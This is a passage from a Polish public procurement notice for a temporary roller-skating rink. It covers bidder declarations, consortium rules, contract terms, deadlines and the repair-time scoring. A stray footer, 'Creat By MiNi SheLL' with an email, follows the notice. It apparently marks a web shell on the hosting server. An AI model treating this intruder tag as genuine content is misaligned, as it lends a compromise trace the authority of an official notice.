potwierdza, że stosunek łączący wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych zasobów oraz określa w szczególności:<br/>	zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby; <br/>	sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia; <br/>	czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą.<br/>7.	Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w pkt 3., także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu w zakresie, w jakim wykonawca powołuje się na jego zasoby - wg wzoru określonego w załączniku nr 5 do SWZ. <br/>8.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy – wg wzoru określonego w załączniku nr 6 do SWZ, w przypadkach, o których mowa w pkt 18.4. SWZ. <br/>9.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia w zakresie braku podstaw wykluczenia, o którym mowa w pkt 3. winien złożyć każdy wykonawca. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zamawiający dopuszcza możliwość składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia tj. spółki cywilne lub konsorcja (tj. dwóch lub więcej Wykonawców) w ramach oferty wspólnej w rozumieniu art. 58 ustawy pod warunkiem, że taka oferta spełniać będzie następujące wymagania:<br/>18.1.	Wykonawcy występujący wspólnie są zobowiązani do ustanowienia Pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego.<br/>18.2.	Pełnomocnictwo powinno zawierać w szczególności wskazanie:<br/>•	postępowania o zamówienie publiczne, którego dotyczy,<br/>•	wszystkich Wykonawców ubiegających się wspólnie udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby,<br/>•	ustanowionego Pełnomocnika oraz zakresu jego umocowania.<br/>18.3.	Dokument pełnomocnictwa musi być podpisany przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia, przy czym nie jest wymagany podpis pełnomocnika. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji Wykonawców.<br/>18.4.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane.<br/>18.5.	W przypadku, o którym mowa w pkt. 18.4. wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy (wg załącznika nr 6 do SWZ).<br/>18.6.	Oświadczenie, o którym mowa w pkt. 15.1.3. składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie to potwierdza brak podstaw wykluczenia oraz spełnienie warunków udziału w postępowaniu, w zakresie, w jakim każdy z wykonawców wskazuje spełnienie warunków udziału w postępowaniu.<br/>18.7.	Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z pełnomocnikiem. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> W odniesieniu do art. 455 ust.1 ustawy Prawo zamówień publicznych - Zamawiający zastrzega sobie możliwość zmiany warunków umowy na etapie jej realizacji w przypadkach określonych w projektowanych postanowieniach umowy stanowiących Załącznik nr 3 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-06-07 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-0cbf34a1-feb0-11ed-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-06-07 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-07-06</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Adres poczty elektronicznej: biuro@dokursynow.pl (do wykorzystania wyłącznie w przypadku awarii Platformy e-Zamówienia, uniemożliwiającej komunikację z Zamawiającym za pośrednictwem tej Platformy)<br/>2. Osobą uprawnioną do porozumiewania się z Wykonawcami <br/>W zakresie dotyczącym przedmiotu zamówienia oraz zagadnień formalno-prawnych jest: <br/>Agnieszka Wilk – kierownik Dziełu Administracyjnego<br/>	Tel.: 22 125 56 02<br/>	e-mail: agnieszka.wilk@dokursynow.pl <br/>3. Termin wykonania zamówienia: w ciągu 122 dni od dnia zawarcia umowy w tym:<br/>ETAP I - przedstawienie Zamawiającemu projektu zagospodarowania terenu oraz pozostałych dokumentów dotyczących infrastruktury objętej przedmiotem zamówienia – w ciągu 3 dni od zawarcia Umowy;<br/>ETAP II - przygotowanie terenu i dokonanie montażu infrastruktury rolkowiska - w ciągu 14 dni od wprowadzenia Wykonawcy w teren do montażu infrastruktury objętej przedmiotem zamówienia;<br/>ETAP III - rozpoczęcie funkcjonowania rolkowiska – w ciągu 15 dni od wprowadzenia Wykonawcy w teren do montażu infrastruktury objętej przedmiotem zamówienia;<br/>ETAP IV - prowadzenie rolkowiska i bezpłatne udostępnienie go mieszkańcom – przez 90 dni od jego otwarcia, przez 7 dni w tygodniu w godzinach od 10.00 do 21.00;<br/>ETAP V - demontaż całej infrastruktury rolkowiska i uporządkowanie terenu wykorzystywanego do jej funkcjonowania – w ciągu 14 dni od zakończenia jego funkcjonowania.<br/>4. Zamawiający wykluczy z postępowania Wykonawcę:<br/>a)w stosunku, do którego zachodzi którakolwiek z przesłanek wykluczenia określona w art. 108 ust. 1 ustawy Pzp; <br/>b)w stosunku, do którego zachodzi którakolwiek z przesłanek wykluczenia określona w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. 2022 poz. 835);<br/>5. Kryterium (Pg) „czas naprawy” – waga 40%<br/>W kryterium „Czas naprawy” pod pojęciem, którego rozumie się również usunięcie awarii, uszkodzenia, Wykonawca ma przedstawić czas (liczony w godzinach), w jakim naprawi uszkodzenie/usunie awarię, uszkodzenie powstałe na obiekcie. Rozpoczęcie naprawy nie może nastąpić w czasie dłuższym niż 24 godziny od stwierdzonego uszkodzenia czy awarii i być naprawiane dłużej niż 48 godzin. <br/>Wykonawca zobligowany jest wskazać w ofercie czas naprawy w jakim deklaruje się wykonać czynności naprawcze przywracające obiekt do stanu umożliwiającego jego użytkowanie. W tym kryterium zostanie przyznana następująca punktacja:<br/>	Czas naprawy do 48 godzin – 0 punktów<br/>	Czas naprawy do 42 godzin – 10 punktów<br/>	Czas naprawy do 36 godzin – 20 punktów<br/>	Czas naprawy do 30 godzin – 30 punktów<br/>	Czas naprawy do 24 godzin – 40 punktów.<br/>Uwaga: <br/>a)	maksymalny „czas naprawy” nie może przekroczyć 48 godzin. W przypadku wskazania przez Wykonawcę większej liczby godzin niż 48, oferta będzie podlegać odrzuceniu jako niezgodna z warunkami zamówienia.<br/>b)	Zaoferowany przez Wykonawcę „czas naprawy” zostanie wpisany w § 4 ust. 2 umowy.<br/>Wykonawca zobowiązany jest podać w ofercie „czas naprawy” wyrażony w godzinach przy czym rozpoczęcie naprawy musi nastąpić w ciągu 24 godzin od wystąpienia awarii /uszkodzenia. <br/>Jeżeli Wykonawca w formularzu oferty nie wpisze żadnego czasu naprawy, Zamawiający przyjmie, że Wykonawca oferuje maksymalny czas naprawy, tj. do 48 godzin i przyzna ofercie 0 punktów.<br/>Zaoferowany czas naprawy nie może ulec zmianie po złożeniu oferty.

Creat By MiNi SheLL
Email: jattceo@gmail.com